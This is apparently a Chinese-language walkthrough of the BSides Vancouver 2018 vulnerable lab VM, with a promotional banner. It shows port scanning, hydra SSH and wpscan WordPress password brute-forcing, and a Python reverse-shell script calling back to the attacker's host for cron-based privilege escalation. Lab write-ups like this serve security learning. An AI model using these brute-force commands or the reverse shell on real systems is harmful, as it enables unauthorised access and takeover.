概述:

Name: BSides Vancouver: 2018 (Workshop)

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

Date release: 21 Mar 2018

Author: abatchy

Series: BSides Vancouver

Web page: https://www.abatchy.com/projects

下载:

https://www.dropbox.com/s/j3r9l7kaydwsdm9/BSides-Vancouver-2018-Workshop.ova

 

方法1:主机侧面攻击

扫描探测主机IP:

Hacking Bsides Vancouver 2018 walkthrough Safe 第1张

 

主机信息详细探测

╰─ nmap -v -p1-65535 -sV -O -sT 10.10.202.130

….

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 2.3.5

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

MAC Address: 00:0C:29:E9:7F:EE (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Uptime guess: 0.672 days (since Wed Mar  6 19:54:37 2019)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=249 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Ftp 匿名登录尝试

Hacking Bsides Vancouver 2018 walkthrough Safe 第2张

收集到一个用户的备份信息

╰─ cat users.txt.bk

abatchy

john

mai

anne

doomguy

SSH尝试登录尝试

Hacking Bsides Vancouver 2018 walkthrough Safe 第3张

经过尝试,只有用户anne开启了密码登录,我们接下来尝试暴力破解

字典

git clone https://github.com/danielmiessler/SecLists.git

Kail linux: /usr/share/wordlists/rockyou.txt

 

╰─ hydra -l anne -P /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt 10.10.202.130 ssh

Hacking Bsides Vancouver 2018 walkthrough Safe 第4张

╰─ hydra -l anne -P /usr/share/wordlists/rockyou.txt 10.10.202.130 ssh

 Hacking Bsides Vancouver 2018 walkthrough Safe 第5张

 

方法2:从WEB入手

Hacking Bsides Vancouver 2018 walkthrough Safe 第6张

目录探测dirb

╰─ dirb http://10.10.202.130/

Hacking Bsides Vancouver 2018 walkthrough Safe 第7张

Hacking Bsides Vancouver 2018 walkthrough Safe 第8张

使用WPSCAN 进行扫描

# wpscan --update

# wpscan --url http://10.10.202.130/backup_wordpress/ --enumerate u #用户枚举

 

Hacking Bsides Vancouver 2018 walkthrough Safe 第9张

进行爆破

╰─ wpscan --url http://10.10.202.131/backup_wordpress/ --wordlist /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt --username john

Hacking Bsides Vancouver 2018 walkthrough Safe 第10张

Hacking Bsides Vancouver 2018 walkthrough Safe 第11张

Hacking Bsides Vancouver 2018 walkthrough Safe 第12张

Hacking Bsides Vancouver 2018 walkthrough Safe 第13张

Hacking Bsides Vancouver 2018 walkthrough Safe 第14张

进行提权

Hacking Bsides Vancouver 2018 walkthrough Safe 第15张

./LinEnum.sh >> LinEnum.log

Hacking Bsides Vancouver 2018 walkthrough Safe 第16张

Shell.sh

#!/bin/bash

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.202.136",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

 Hacking Bsides Vancouver 2018 walkthrough Safe 第17张

Hacking Bsides Vancouver 2018 walkthrough Safe 第18张

方法3:msf 

Hacking Bsides Vancouver 2018 walkthrough Safe 第19张

Hacking Bsides Vancouver 2018 walkthrough Safe 第20张

Hacking Bsides Vancouver 2018 walkthrough Safe 第21张

提权同上,计划任务提权

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄